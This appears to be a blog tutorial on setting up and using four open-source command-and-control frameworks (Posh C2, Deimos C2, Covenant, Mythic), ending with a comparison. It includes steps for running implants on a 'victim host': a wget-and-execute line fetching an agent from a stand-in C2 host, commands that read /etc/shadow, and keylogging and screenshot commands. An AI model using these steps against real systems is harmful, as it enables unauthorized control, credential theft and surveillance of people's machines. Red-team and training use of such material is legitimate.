C2 frameworks are post-exploitation tools used by pentesters and threat actors to manage compromised hosts from a centralised location.
In this post I will walk through the following popular open-source C2 frameworks and then compare them.
- Posh C2
- Deimos C2
- Covenant
- Mythic
Minimum requirements for the C2 server:
- 1 vCPU
- 1 GB of RAM
- 15 GB of storage
POSH C2
Posh C2 is maintained by Nettitude, a cyber security consultancy [Link]. It allows teams to collaborate on a single server instance and keeps all activity (commands and outputs) logged with timestamps. Traffic is encrypted even over HTTP.
INSTALLATION
Quick installation on Kali:
curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2/master/Install.sh | sudo bash
Or from the Kali repository:
sudo apt install poshc2 -y
Quick installation on Docker:
sudo apt update && sudo apt install docker.io -y curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2/master/Install-for-Docker.sh | sudo bash
SERVER SETUP
Create a project at /var/poshc2/dft-c2/payloads/:
posh-project -n dft-c2
Open the configuration file:
posh-config
Set the IP or hostname of the C2:
PayloadCommsHost: "https://c2.example.com"
Start the server manually:
posh-server
Start or stop the server as a service:
posh-service posh-stop-service
Note: compiled implants are placed at /var/poshc2/dft-c2/payloads, where dft-c2 is the project name used in this example. You can review the quick start information at any time by running cat /var/poshc2/dft-c2/quickstart.txt.
HANDLING CONNECTIONS
Start the ImplantHandler:
posh -u userName
At this point an implant must be executed on the victim host. Press Enter to refresh until it appears.
After selecting the number of the connected implant, try the following commands:
listmodulesget-computerinfoget-ipconfigget-userinfofind-allvulnsinvoke-arpscanget-screenshotget-keystrokesGet-KeystrokeData
- …
DEIMOS C2
Deimos C2 is written in Go. All communications are encrypted with a unique RSA key pair per listener. It includes a multi-user Web UI with graphical maps for interacting with listeners and agents [Link].
INSTALLATION
https://github.com/DeimosC2/DeimosC2/releases/download/1.1.0/DeimosC2_linux.zip sudo apt install unzip -y unzip DeimosC2_linux.zip chmod +x ./DeimosC2 && ./DeimosC2
SETUP
Navigate to the server’s public IP or hostname (e.g. https://c2.example.com:8443/).


Go to LISTENERS > Add Listener.

Selected agents will be compiled automatically but can also be generated on demand.


Agent binaries are located at the following path, inside a directory named after the listener’s key (UUID format):
cd ~/resources/listenerresources/3c1076cd-cc30-4b4e-960f-4498ceb72c82 python3 -m http.server 8080
Download and execute the agent binary on the victim host:
wget http://c2.example.com:8080/HTTPSAgent_Lin_amd64_Intel chmod +x HTTPSAgent_Lin_amd64_Intel ./HTTPSAgent_Lin_amd64_Intel
It will take a few seconds to establish a connection.




Try the following commands:
shell whoamishell cat /etc/shadowmodule shadowdump
COVENANT
Covenant is another collaborative C2 framework focused on highlighting the attack surface of .NET [Link].
INSTALLATION
The Docker version is recommended to avoid having to install the .NET Core 3.1 SDK manually.
git clone --recurse-submodules https://github.com/cobbr/Covenant cd Covenant/Covenant sudo apt install docker.io -y sudo docker build -t covenant . sudo docker run -it -p 7443:7443 -p 80:80 -p 443:443 --name covenant -d -v /FULL_PATH/Covenant/Covenant/Data:/app/Data covenant
Note: the FULL_PATH must point to the directory where the configuration is located.
SETUP
Navigate to https://c2.example.com:7443/ (replace the hostname accordingly).


Go to Listeners > +Create.


MANAGING THE CONTAINER
docker start covenant docker stop covenant docker rm covenant
MYTHIC
Mythic is a cross-platform framework written in Go that runs in containers and can be managed via a Web UI and CLI [Link].
It requires more than 2 vCPUs and 1 GB of RAM to run smoothly.
INSTALLATION
sudo apt update && sudo apt upgrade -y sudo apt install docker.io gcc build-essential docker-compose docker-compose-plugin -y git clone https://github.com/its-a-feature/Mythic.git cd Mythic sudo make ./install_docker_ubuntu.sh cd Mythic sudo ./mythic-cli start cat Mythic/.env | grep MYTHIC_ADMIN_PASSWORD
Navigate to https://c2.example.com:7443/ (replace the hostname accordingly).

Log in with the default username mythic_admin and the randomly generated password found in Mythic/.env.

It includes a built-in reference library based on MITRE ATT&CK:

EXTENSIONS
You can extend the framework by installing additional agents and profiles:

sudo ./mythic-cli install github https://github.com/MythicAgents/athena sudo ./mythic-cli install github https://github.com/MythicC2Profiles/basic_logger
REFLECTIONS AND OBSERVATIONS
- Posh C2
- Not particularly sophisticated,
- Has issues with Python libraries and dependencies,
- Available in Kali’s repository,
- Heavily focused on Windows.
- Deimos C2
- Clean Web UI but unstable,
- The terminal feature is slow due to the agent polling the server periodically for commands,
- Easy to deploy with pre-compiled server and agent binaries.
- Covenant
- Polished Web UI,
- The terminology around Launchers and Grunts can be confusing,
- Exclusively focused on .NET.
- Mythic
- The most resource-intensive but also the most feature-rich of the four,
- A wide variety of extensions and add-ons available,
- Having MITRE ATT&CK [Link] references a single click away is a great touch.